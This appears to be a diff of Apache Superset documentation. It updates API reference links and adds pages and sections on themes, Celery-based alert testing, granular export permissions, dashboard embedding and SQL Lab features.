| `PUT` | [Update security permissions resources by pk](/developer-docs/api/update-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -481,14 +481,14 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete RLS rules](./api/bulk-delete-rls-rules) | `/api/v1/rowlevelsecurity/` |
|
||||
| `GET` | [Get a list of RLS](./api/get-a-list-of-rls) | `/api/v1/rowlevelsecurity/` |
|
||||
| `POST` | [Create a new RLS rule](./api/create-a-new-rls-rule) | `/api/v1/rowlevelsecurity/` |
|
||||
| `GET` | [Get metadata information about this API resource (rowlevelsecurity--info)](./api/get-metadata-information-about-this-api-resource-rowlevelsecurity-info) | `/api/v1/rowlevelsecurity/_info` |
|
||||
| `DELETE` | [Delete an RLS](./api/delete-an-rls) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `GET` | [Get an RLS](./api/get-an-rls) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `PUT` | [Update an RLS rule](./api/update-an-rls-rule) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `GET` | [Get related fields data (rowlevelsecurity-related-column-name)](./api/get-related-fields-data-rowlevelsecurity-related-column-name) | `/api/v1/rowlevelsecurity/related/{column_name}` |
|
||||
| `DELETE` | [Bulk delete RLS rules](/developer-docs/api/bulk-delete-rls-rules) | `/api/v1/rowlevelsecurity/` |
|
||||
| `GET` | [Get a list of RLS](/developer-docs/api/get-a-list-of-rls) | `/api/v1/rowlevelsecurity/` |
|
||||
| `POST` | [Create a new RLS rule](/developer-docs/api/create-a-new-rls-rule) | `/api/v1/rowlevelsecurity/` |
|
||||
| `GET` | [Get metadata information about this API resource (rowlevelsecurity--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-rowlevelsecurity-info) | `/api/v1/rowlevelsecurity/_info` |
|
||||
| `DELETE` | [Delete an RLS](/developer-docs/api/delete-an-rls) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `GET` | [Get an RLS](/developer-docs/api/get-an-rls) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `PUT` | [Update an RLS rule](/developer-docs/api/update-an-rls-rule) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `GET` | [Get related fields data (rowlevelsecurity-related-column-name)](/developer-docs/api/get-related-fields-data-rowlevelsecurity-related-column-name) | `/api/v1/rowlevelsecurity/related/{column_name}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -499,8 +499,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Export all assets](./api/export-all-assets) | `/api/v1/assets/export/` |
|
||||
| `POST` | [Import multiple assets](./api/import-multiple-assets) | `/api/v1/assets/import/` |
|
||||
| `GET` | [Export all assets](/developer-docs/api/export-all-assets) | `/api/v1/assets/export/` |
|
||||
| `POST` | [Import multiple assets](/developer-docs/api/import-multiple-assets) | `/api/v1/assets/import/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -509,7 +509,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | [Invalidate cache records and remove the database records](./api/invalidate-cache-records-and-remove-the-database-records) | `/api/v1/cachekey/invalidate` |
|
||||
| `POST` | [Invalidate cache records and remove the database records](/developer-docs/api/invalidate-cache-records-and-remove-the-database-records) | `/api/v1/cachekey/invalidate` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -518,10 +518,10 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get a list of logs](./api/get-a-list-of-logs) | `/api/v1/log/` |
|
||||
| `POST` | [Create log](./api/create-log) | `/api/v1/log/` |
|
||||
| `GET` | [Get a log detail information](./api/get-a-log-detail-information) | `/api/v1/log/{pk}` |
|
||||
| `GET` | [Get recent activity data for a user](./api/get-recent-activity-data-for-a-user) | `/api/v1/log/recent_activity/` |
|
||||
| `GET` | [Get a list of logs](/developer-docs/api/get-a-list-of-logs) | `/api/v1/log/` |
|
||||
| `POST` | [Create log](/developer-docs/api/create-log) | `/api/v1/log/` |
|
||||
| `GET` | [Get a log detail information](/developer-docs/api/get-a-log-detail-information) | `/api/v1/log/{pk}` |
|
||||
| `GET` | [Get recent activity data for a user](/developer-docs/api/get-recent-activity-data-for-a-user) | `/api/v1/log/recent_activity/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -532,8 +532,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get the user object](./api/get-the-user-object) | `/api/v1/me/` |
|
||||
| `GET` | [Get the user roles](./api/get-the-user-roles) | `/api/v1/me/roles/` |
|
||||
| `GET` | [Get the user object](/developer-docs/api/get-the-user-object) | `/api/v1/me/` |
|
||||
| `GET` | [Get the user roles](/developer-docs/api/get-the-user-roles) | `/api/v1/me/roles/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -542,7 +542,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get the user avatar](./api/get-the-user-avatar) | `/api/v1/user/{user_id}/avatar.png` |
|
||||
| `GET` | [Get the user avatar](/developer-docs/api/get-the-user-avatar) | `/api/v1/user/{user_id}/avatar.png` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -551,7 +551,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get menu](./api/get-menu) | `/api/v1/menu/` |
|
||||
| `GET` | [Get menu](/developer-docs/api/get-menu) | `/api/v1/menu/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -560,7 +560,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get all available domains](./api/get-all-available-domains) | `/api/v1/available_domains/` |
|
||||
| `GET` | [Get all available domains](/developer-docs/api/get-all-available-domains) | `/api/v1/available_domains/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -569,7 +569,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Read off of the Redis events stream](./api/read-off-of-the-redis-events-stream) | `/api/v1/async_event/` |
|
||||
| `GET` | [Read off of the Redis events stream](/developer-docs/api/read-off-of-the-redis-events-stream) | `/api/v1/async_event/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -578,7 +578,29 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get api by version openapi](./api/get-api-by-version-openapi) | `/api/{version}/_openapi` |
|
||||
| `GET` | [Get api by version openapi](/developer-docs/api/get-api-by-version-openapi) | `/api/{version}/_openapi` |
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><strong>Themes</strong> (14 endpoints) — Manage UI themes for customizing Superset's appearance.</summary>
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete themes](/developer-docs/api/bulk-delete-themes) | `/api/v1/theme/` |
|
||||
| `GET` | [Get a list of themes](/developer-docs/api/get-a-list-of-themes) | `/api/v1/theme/` |
|
||||
| `POST` | [Create a theme](/developer-docs/api/create-a-theme) | `/api/v1/theme/` |
|
||||
| `GET` | [Get metadata information about this API resource (theme-info)](/developer-docs/api/get-metadata-information-about-this-api-resource-theme-info) | `/api/v1/theme/_info` |
|
||||
| `DELETE` | [Delete a theme](/developer-docs/api/delete-a-theme) | `/api/v1/theme/{pk}` |
|
||||
| `GET` | [Get a theme](/developer-docs/api/get-a-theme) | `/api/v1/theme/{pk}` |
|
||||
| `PUT` | [Update a theme](/developer-docs/api/update-a-theme) | `/api/v1/theme/{pk}` |
|
||||
| `PUT` | [Set a theme as the system dark theme](/developer-docs/api/set-a-theme-as-the-system-dark-theme) | `/api/v1/theme/{pk}/set_system_dark` |
|
||||
| `PUT` | [Set a theme as the system default theme](/developer-docs/api/set-a-theme-as-the-system-default-theme) | `/api/v1/theme/{pk}/set_system_default` |
|
||||
| `GET` | [Download multiple themes as YAML files](/developer-docs/api/download-multiple-themes-as-yaml-files) | `/api/v1/theme/export/` |
|
||||
| `POST` | [Import themes from a ZIP file](/developer-docs/api/import-themes-from-a-zip-file) | `/api/v1/theme/import/` |
|
||||
| `GET` | [Get related fields data (theme-related-column-name)](/developer-docs/api/get-related-fields-data-theme-related-column-name) | `/api/v1/theme/related/{column_name}` |
|
||||
| `DELETE` | [Clear the system dark theme](/developer-docs/api/clear-the-system-dark-theme) | `/api/v1/theme/unset_system_dark` |
|
||||
| `DELETE` | [Clear the system default theme](/developer-docs/api/clear-the-system-default-theme) | `/api/v1/theme/unset_system_default` |
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
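As a quick illustration of the theme endpoints above (a sketch; the host, token, and theme id `1` are placeholders):

```bash
# Sketch: list themes, then promote theme 1 to system default (paths per the table above)
curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  "http://localhost:8088/api/v1/theme/"

curl -X PUT -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  "http://localhost:8088/api/v1/theme/1/set_system_default"
```
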
@@ -39,13 +39,17 @@ superset-extensions bundle: Packages the extension into a .supx file.

superset-extensions dev: Automatically rebuilds the extension as files change.

-superset-extensions validate: Validates the extension structure and metadata.
+superset-extensions validate: Validates the extension structure and metadata consistency.

+superset-extensions update: Updates derived and generated files in the extension project.
+  Use --version [<version>] to update the version (prompts if no value given).
+  Use --license [<license>] to update the license (prompts if no value given).
```

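For example, a version bump might look like the following sketch (flags as listed in the help text above; the version value is illustrative):

```bash
# Sketch: regenerate derived files and set an explicit version in one step
superset-extensions update --version 1.1.0

# Omitting the value falls back to an interactive prompt, per the help text
superset-extensions update --license
```
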
When creating a new extension with `superset-extensions init`, the CLI generates a standardized folder structure:

```
-my-org.dataset-references/
+dataset-references/
├── extension.json
├── frontend/
│   ├── src/

@@ -76,7 +80,7 @@ my-org.dataset-references/
```

**Note**: With publisher `my-org` and name `dataset-references`, the technical names are:
-- Directory name: `my-org.dataset-references` (kebab-case)
+- Directory name: `dataset-references` (kebab-case)
- Backend Python namespace: `my_org.dataset_references`
- Backend distribution package: `my_org-dataset_references`
- Frontend package name: `@my-org/dataset-references` (scoped)

@@ -75,7 +75,7 @@ This approach ensures that extensions from different organizations cannot confli

This creates a complete project structure:

```
-my-org.hello-world/
+hello-world/
├── extension.json          # Extension metadata and configuration
├── backend/                # Backend Python code
│   ├── src/

@@ -52,7 +52,6 @@ module.exports = {
      'extensions/development',
      'extensions/deployment',
-     'extensions/mcp',
      'extensions/mcp-server',
      'extensions/security',
      'extensions/tasks',
      'extensions/registry',

@@ -63,6 +63,109 @@ pytest tests/unit_tests/
pytest tests/integration_tests/
```

## Testing Alerts & Reports with Celery and MailHog

The Alerts & Reports feature relies on Celery for task scheduling and execution. To test it locally, you need Redis (message broker), Celery Beat (scheduler), a Celery Worker (executor), and an SMTP server to receive email notifications.

### Prerequisites

- Redis running on `localhost:6379`
- [MailHog](https://github.com/mailhog/MailHog) installed (a local SMTP server with a web UI for viewing caught emails)

### superset_config.py

Your `CeleryConfig` **must** include `beat_schedule`. When you define a custom `CeleryConfig` class in `superset_config.py`, it replaces the default entirely. If you omit `beat_schedule`, Celery Beat will start but never schedule any report tasks.

```python
from celery.schedules import crontab
from superset.tasks.types import ExecutorType

REDIS_HOST = "localhost"
REDIS_PORT = "6379"

class CeleryConfig:
    broker_url = f"redis://{REDIS_HOST}:{REDIS_PORT}/0"
    result_backend = f"redis://{REDIS_HOST}:{REDIS_PORT}/0"
    broker_connection_retry_on_startup = True
    imports = (
        "superset.sql_lab",
        "superset.tasks.scheduler",
        "superset.tasks.thumbnails",
        "superset.tasks.cache",
    )
    worker_prefetch_multiplier = 10
    task_acks_late = True
    beat_schedule = {
        "reports.scheduler": {
            "task": "reports.scheduler",
            "schedule": crontab(minute="*", hour="*"),
        },
        "reports.prune_log": {
            "task": "reports.prune_log",
            "schedule": crontab(minute=0, hour=0),
        },
    }

CELERY_CONFIG = CeleryConfig

# SMTP settings pointing to MailHog
SMTP_HOST = "localhost"
SMTP_PORT = 1025
SMTP_STARTTLS = False
SMTP_SSL = False
SMTP_USER = ""
SMTP_PASSWORD = ""
SMTP_MAIL_FROM = "superset@localhost"

# Must match where your frontend is running
WEBDRIVER_BASEURL = "http://localhost:9000/"

ALERT_REPORTS_EXECUTE_AS = [ExecutorType.OWNER]

FEATURE_FLAGS = {
    "ALERT_REPORTS": True,
    # Recommended for better screenshot support (WebGL/DeckGL charts)
    "PLAYWRIGHT_REPORTS_AND_THUMBNAILS": True,
}
```

:::note
Do not include `"superset.tasks.async_queries"` in `CeleryConfig.imports` unless you need Global Async Queries. That module accesses `current_app.config` at import time and will crash the worker with a "Working outside of application context" error.
:::

### Starting the Services

Start MailHog, then Celery Beat and Worker in separate terminals:

```bash
# Terminal 1 - MailHog (SMTP on :1025, Web UI on :8025)
MailHog

# Terminal 2 - Celery Beat (scheduler)
celery --app=superset.tasks.celery_app:app beat --loglevel=info

# Terminal 3 - Celery Worker (executor)
celery --app=superset.tasks.celery_app:app worker --concurrency=1 --loglevel=info
```

Use `--concurrency=1` to limit resource usage on your dev machine.

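Before creating a report, two quick sanity checks can confirm the wiring (a sketch; task names assume the config above):

```bash
# Redis should answer PONG if the broker is reachable
redis-cli -h localhost -p 6379 ping

# The worker should list the report tasks among its registered tasks
celery --app=superset.tasks.celery_app:app inspect registered | grep reports
```
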
### Verifying the Setup

1. **Beat** should log `Scheduler: Sending due task reports.scheduler (reports.scheduler)` once per minute
2. **Worker** should log `Scheduling alert <name> eta: <timestamp>` for each active report
3. Create a test report in **Settings > Alerts & Reports** with a `* * * * *` cron schedule
4. Check **http://localhost:8025** (MailHog web UI) for the email within 1-2 minutes

### Troubleshooting

| Problem | Solution |
|---|---|
| Beat shows no output | Ensure `beat_schedule` is defined in your `CeleryConfig` and `--loglevel=info` is set |
| "Report Schedule is still working, refusing to re-compute" | Previous executions are stuck. Reset with: `UPDATE report_schedule SET last_state = 'Not triggered' WHERE id = <id>;` |
| Task backlog overwhelming the worker | Flush Redis: `redis-cli FLUSHDB`, then restart Beat and Worker |
| Screenshot timeout | Ensure your frontend dev server is running and `WEBDRIVER_BASEURL` matches its URL |

---

*This documentation is under active development. Check back soon for updates!*

@@ -91,7 +91,7 @@ or a view.
When working with tables, the solution would be to create a table that contains all the fields
needed for your analysis, most likely through some scheduled batch process.

-A view is a simple logical layer that abstracts an arbitrary SQL queries as a virtual table. This can
+A view is a simple logical layer that abstracts an arbitrary SQL query as a virtual table. This can
allow you to join and union multiple tables and to apply some transformation using arbitrary SQL
expressions. The limitation there is your database performance, as Superset effectively will run a
query on top of your query (view). A good practice may be to limit yourself to joining your main

docs/docs/security/granular-export-controls.mdx (new file, 78 lines)
@@ -0,0 +1,78 @@
---
title: Granular Export Controls
sidebar_position: 4
---

# Granular Export Controls

Superset provides granular, permission-based controls for data export, image export, and clipboard operations. These replace the legacy `can_csv` permission with three fine-grained permissions that can be assigned independently to roles.

## Feature Flag

Granular export controls are gated behind the `GRANULAR_EXPORT_CONTROLS` feature flag. When the flag is disabled, the legacy `can_csv` permission behavior is preserved.

```python
FEATURE_FLAGS = {
    "GRANULAR_EXPORT_CONTROLS": True,
}
```

## Permissions

| Permission | Resource | Controls |
| -------------------- | ---------- | ---------------------------------------------------------------------- |
| `can_export_data` | `Superset` | CSV, Excel, and JSON data exports from charts, dashboards, and SQL Lab |
| `can_export_image` | `Superset` | Screenshot (JPEG/PNG) and PDF exports from charts and dashboards |
| `can_copy_clipboard` | `Superset` | Copy-to-clipboard operations in SQL Lab and the Explore data pane |

## Default Role Assignments

The migration grants all three new permissions (`can_export_data`, `can_export_image`, `can_copy_clipboard`) to every role that currently has `can_csv`. This preserves existing behavior — no role loses access during the upgrade.

After the migration, admins can selectively revoke individual export permissions from any role to restrict access. For example, to prevent Gamma users from exporting data or images while still allowing clipboard operations, revoke `can_export_data` and `can_export_image` from the Gamma role.

## Configuration Steps

1. **Enable the feature flag** in `superset_config.py`:

   ```python
   FEATURE_FLAGS = {
       "GRANULAR_EXPORT_CONTROLS": True,
   }
   ```

2. **Run the database migration** to register the new permissions:

   ```bash
   superset db upgrade
   ```

3. **Initialize permissions** so roles are populated:

   ```bash
   superset init
   ```

4. **Verify role assignments** in **Settings > List Roles**. Confirm that each role has the expected permissions from the table above.

5. **Customize as needed**: Grant or revoke individual export permissions on any role through the role editor.

## User Experience

When a user lacks a required export permission:

- **Menu items** (CSV, Excel, JSON, screenshot) appear **disabled** with an info tooltip icon explaining the restriction
- **Buttons** (SQL Lab download, clipboard copy) appear **disabled** with a tooltip on hover
- **API endpoints** return **403 Forbidden** when the corresponding permission is missing

## API Enforcement

The following API endpoints enforce granular export permissions when the feature flag is enabled:

| Endpoint | Required Permission |
| --------------------------------------------------------- | ------------------- |
| `GET /api/v1/chart/{id}/data/` (CSV/Excel format) | `can_export_data` |
| `GET /api/v1/chart/{id}/cache_screenshot/` | `can_export_image` |
| `POST /api/v1/dashboard/{id}/cache_dashboard_screenshot/` | `can_export_image` |
| `GET /api/v1/sqllab/export/{client_id}/` | `can_export_data` |
| `POST /api/v1/sqllab/export_streaming/` | `can_export_data` |

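To spot-check enforcement, call one of these endpoints as a user whose role lacks the permission (a sketch; the host, chart id, and `format` query parameter are illustrative):

```bash
# Expect HTTP 403 when the requesting user's roles lack can_export_data
curl -s -o /dev/null -w "%{http_code}\n" \
  -H "Authorization: Bearer USER_ACCESS_TOKEN" \
  "http://localhost:8088/api/v1/chart/42/data/?format=csv"
```
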
@@ -63,6 +63,12 @@ by clicking the **Connect** button in the bottom right corner of the modal windo

Congratulations, you've just added a new data source in Superset!

### Sharing a Database Connection

When adding a new database, you can share the connection with other Superset users. Shared connections appear in other users' database lists, making it easier to collaborate on the same data without requiring each user to configure the same connection separately.

To share a connection, enable the **Share connection with other users** option in the **Advanced** tab of the database connection modal before saving. You can change sharing settings later by editing the database connection.

### Registering a new table

Now that you've configured a data source, you can select specific tables (called **Datasets** in Superset)

@@ -80,6 +86,22 @@ we register the **cleaned_sales_data** table from the **examples** database.

To finish, click the **Add** button in the bottom right corner. You should now see your dataset in the list of datasets.

### Organizing Datasets into Folders

The Datasets list view supports **folders** for organizing datasets into groups. To create and manage folders:

1. In the **Datasets** list, click the **Folders** panel on the left sidebar.
2. Click **+ New Folder** to create a top-level folder, or drag an existing folder to nest it.
3. Drag dataset rows onto a folder to move them in, or right-click a dataset and select **Move to folder**.

Folders are per-user organizational aids — they do not affect dataset access permissions or how other users see the datasets.

### Uploading Files via the OS File Manager (PWA)

When Superset is installed as a **Progressive Web App (PWA)** from your browser, your operating system will offer Superset as an option when opening CSV, Excel (`.xls`/`.xlsx`), and Parquet files. Double-clicking or right-clicking a supported file and selecting "Open with Superset" navigates directly to the upload workflow for that file.

To install Superset as a PWA, look for the install icon in your browser's address bar (Chrome, Edge) when visiting your Superset instance over HTTPS. PWA installation requires HTTPS and a valid manifest — your admin needs to confirm the app manifest is served correctly.

### Customizing column properties

Now that you've registered your dataset, you can configure column properties

@@ -234,6 +256,64 @@ For example, when running the local development build, the following will disabl
Top Nav and remove the Filter Bar:
`http://localhost:8088/superset/dashboard/my-dashboard/?standalone=1&show_filters=0`

### AG Grid Interactive Table

The **AG Grid Interactive Table** chart type is Superset's fully-featured data grid, suitable for large paginated datasets where the standard Table chart is not enough.

#### Server-Side Column Filters

AG Grid supports server-side column filters that query the full dataset — not just the loaded page. Filters are applied before data is sent to the browser, so results are correct even across millions of rows.

**Available filter types:**

| Column type | Filter options |
|---|---|
| Text | Contains, equals, starts with, ends with |
| Number | Equals, not equal, less than, greater than, between |
| Date | Before, after, between, blank |
| Set | Select from a list of distinct values |

**AND / OR logic:** Each column supports combining multiple conditions with AND or OR. Filters from different columns are always combined with AND.

**Interaction with pagination:** Server-side filters run as WHERE clauses in the underlying SQL query, so pagination always operates over the already-filtered result set.

#### Time Shift (Time Comparison)

AG Grid Interactive Table supports **Time Shift** (time comparison), matching the behavior of the standard Table chart. In the **Advanced Analytics** → **Time Comparison** section of the chart configuration, enter a shift expression (e.g., `1 year ago`, `minus 7 days`) to add comparison columns showing values from the offset period. Dashboard-level time range overrides apply to both the base and comparison periods.

### Dynamic Currency Formatting

Chart metric values can display currencies dynamically rather than using a fixed currency code. To enable:

1. Open the dataset editor for your dataset (**Datasets → Edit**).
2. In the **Advanced** tab, set **Currency Code Column** to the name of a column in your dataset that contains ISO 4217 currency codes (e.g., `USD`, `EUR`, `GBP`).
3. In the Explore chart configuration, open the metric's **Number format** section and select **Auto-detect** for currency.

When Auto-detect is active, each row uses the currency code from the designated column, so a single chart can display values in multiple currencies — each formatted correctly for its currency.

### ECharts Option Editor

For ECharts-based chart types (line, bar, area, scatter, pie, and others), Explore includes an advanced **ECharts Option Editor** that accepts raw JSON overrides for the underlying ECharts configuration.

Access it via the **Customize** tab → **ECharts Options** section at the bottom of the panel. The JSON you enter is deep-merged on top of Superset's generated ECharts config, so you can override specific options without rewriting the entire config.

**Example:** override the legend position and add a custom title:

```json
{
  "legend": { "orient": "vertical", "right": "5%", "top": "middle" },
  "title": { "text": "My Custom Title", "left": "center" }
}
```

:::caution
ECharts option overrides bypass Superset's validation layer. Invalid option keys are silently ignored by ECharts. Overrides that conflict with Superset-generated options (e.g., `series`) may produce unexpected results.
:::

### Table Chart: Exporting Filtered Data

When the **Search Box** is visible in a Table chart, the **Download** action exports only the rows currently visible after the search filter is applied — not the full underlying dataset. This matches the visual output and is intentional. To export the full dataset regardless of search state, use the **Download as CSV** option from the chart's three-dot menu in the dashboard or from the Explore chart toolbar before applying a search filter.

:::resources
- [Dashboard Customization](https://docs.preset.io/docs/dashboard-customization) - Advanced dashboard styling and layout options
- [Blog: BI Dashboard Best Practices](https://preset.io/blog/bi-dashboard-best-practices/)

docs/docs/using-superset/embedding.mdx (new file, 130 lines)
@@ -0,0 +1,130 @@
{/*
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at

  http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
*/}

---
title: Embedding Superset
sidebar_position: 6
---

# Embedding Superset

Superset dashboards can be embedded directly in host applications using the `@superset-ui/embedded-sdk` package.

:::info Prerequisites
- The `EMBEDDED_SUPERSET` feature flag must be enabled.
- The embedding domain and allowed origins must be configured by an admin.
:::

## Quick Start

Install the SDK:

```bash
npm install @superset-ui/embedded-sdk
```

Embed a dashboard:

```javascript
import { embedDashboard } from '@superset-ui/embedded-sdk';

embedDashboard({
  id: 'dashboard-uuid-here', // from Dashboard → Embed
  supersetDomain: 'https://superset.example.com',
  mountPoint: document.getElementById('superset-container'),
  fetchGuestToken: () => fetchTokenFromYourBackend(),
  dashboardUiConfig: {
    hideTitle: true,
    filters: { expanded: false },
  },
});
```

`fetchGuestToken` must return a **guest token** obtained from your server by calling Superset's `/api/v1/security/guest_token/` endpoint with a service account. Do not call this endpoint from client-side code.

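Server-side, minting a guest token might look like the following sketch (the payload fields follow the guest token endpoint's schema; the service-account token, dashboard UUID, and RLS clause are placeholders):

```bash
# Sketch: exchange a service-account access token for a short-lived guest token
curl -X POST "https://superset.example.com/api/v1/security/guest_token/" \
  -H "Authorization: Bearer SERVICE_ACCOUNT_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "user": {"username": "embedded-guest"},
    "resources": [{"type": "dashboard", "id": "dashboard-uuid-here"}],
    "rls": [{"clause": "tenant_id = 42"}]
  }'
```

Your backend then returns the token from this response to `fetchGuestToken` in the browser.
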
---

## Callbacks

### `resolvePermalinkUrl`

When a user copies a permalink from an embedded dashboard, Superset generates a URL on its own domain. In an embedded context this URL is usually not meaningful to the host application's users — the dashboard is rendered inside the host app, not at the Superset URL.

The `resolvePermalinkUrl` callback lets the host app intercept permalink generation and return a URL on the host domain instead:

```javascript
embedDashboard({
  id: 'my-dashboard-uuid',
  supersetDomain: 'https://superset.example.com',
  mountPoint: document.getElementById('superset-container'),
  fetchGuestToken: () => fetchGuestToken(),
  /**
   * Called when Superset generates a permalink.
   * @param {Object} args - { key: string } — the permalink key
   * @returns {string | null} - your host URL, or null to use Superset's default
   */
  resolvePermalinkUrl: ({ key }) => {
    return `https://myapp.example.com/dashboard?permalink=${key}`;
  },
});
```

If the callback returns `null` or is not provided, Superset uses its own permalink URL as a fallback.

---

## Feature Flags for Embedded Mode

### `DISABLE_EMBEDDED_SUPERSET_LOGOUT`

Hides the logout button when Superset is embedded in a host application. This is useful when the host application manages the session lifecycle and you do not want users to accidentally log out of the embedded Superset session:

```python
# superset_config.py
FEATURE_FLAGS = {
    "EMBEDDED_SUPERSET": True,
    "DISABLE_EMBEDDED_SUPERSET_LOGOUT": True,
}
```

When enabled, the **Logout** menu item is removed from the user avatar dropdown in the embedded view. The session can still be invalidated server-side by revoking the guest token.

### `EMBEDDED_SUPERSET`

Must be `True` to enable the embedded SDK and the guest token endpoint. Without this flag, `embedDashboard` will fail to load.

---

## URL Parameters

The following URL parameters can be passed through the `urlParams` option in `dashboardUiConfig` or appended to the embedded iframe URL:

| Parameter | Values | Effect |
|-----------|--------|--------|
| `standalone` | `0`, `1`, `2`, `3` | `0`: normal; `1`: hide nav; `2`: hide nav + title; `3`: hide nav + title + tabs |
| `show_filters` | `0`, `1` | Show or hide the native filter bar |
| `expand_filters` | `0`, `1` | Start with filter bar expanded or collapsed |

---

## Security Notes

- **Guest tokens expire** — their lifetime is controlled by the `GUEST_TOKEN_JWT_EXP_SECONDS` config (default: 5 minutes). Refresh tokens before they expire using a token refresh mechanism in your host app.
- **Row-level security** — pass `rls` rules in the guest token request to restrict which rows are visible to the embedded user.
- **Allowed domains** — restrict which host origins can embed a dashboard by setting **Allowed Domains** per-dashboard in the *Embed* settings modal. Superset checks the request's `Referer` header against this list before serving the embedded view; an empty list allows any origin, so configure this explicitly for production.

@@ -329,6 +329,27 @@ various options in this section, refer to the
Lastly, save your chart as Tutorial Resample and add it to the Tutorial Dashboard. Go to the
tutorial dashboard to see the four charts side by side and compare the different outputs.

### SQL Lab Tips

**Schema and table browser**: The left-side table browser uses a collapsible treeview — click a schema to expand its tables, and click a table to see its columns and sample data inline. This makes navigating large schemas much faster than the previous flat list.

**Find in editor**: Press **Ctrl+F** (or **Cmd+F** on Mac) to open the Monaco find/replace widget inside the SQL editor without leaving the editor.

**Resizable panels**: The dividers between the SQL editor, schema browser, and results pane are draggable. Adjust them to match your workflow and screen size.

**Dialect-aware Format SQL**: The **Format SQL** button applies the SQL dialect of the currently selected database — Trino, Presto, MySQL, PostgreSQL, etc. — rather than a generic formatter. Switch to a different database in the toolbar and re-format to get dialect-specific output. Jinja template syntax (`{{ }}`, `{% %}`) is preserved during formatting and will not cause format errors.

### Time Range Natural Language Expressions

The **Custom** time range picker accepts natural language expressions alongside specific dates:

- **Relative**: `Last 7 days`, `Last month`, `Last quarter`, `Last year`
- **Anchored**: `previous calendar week`, `previous calendar month`
- **"First of" expressions**: `first day of this week`, `first day of this month`, `first day of this quarter`, `first day of this year`, `first week of this year`
- **Offsets**: `30 days ago`, `1 year ago`, `next week`

These expressions are evaluated at query time, so saved charts always display data relative to the current date.

:::resources
- [Chart Walkthroughs](https://docs.preset.io/docs/chart-walkthroughs) - Detailed guides for most chart types
- [Blog: Why Apache ECharts is the Future of Apache Superset](https://preset.io/blog/2021-4-1-why-echarts/)

docs/docs/using-superset/using-ai-with-superset.mdx (new file, 277 lines)
@@ -0,0 +1,277 @@
---
title: Using AI with Superset
hide_title: true
sidebar_position: 5
version: 1
---

<!--
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at

  http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
-->

# Using AI with Superset

Superset supports AI assistants through the [Model Context Protocol (MCP)](https://modelcontextprotocol.io/). Connect Claude, ChatGPT, or other MCP-compatible clients to explore your data, build charts, create dashboards, and run SQL -- all through natural language.

:::info
Requires Superset 5.0+. Your admin must enable and deploy the MCP server before you can connect.
See the **[MCP Server admin guide](/admin-docs/configuration/mcp-server)** for setup instructions.
:::

---

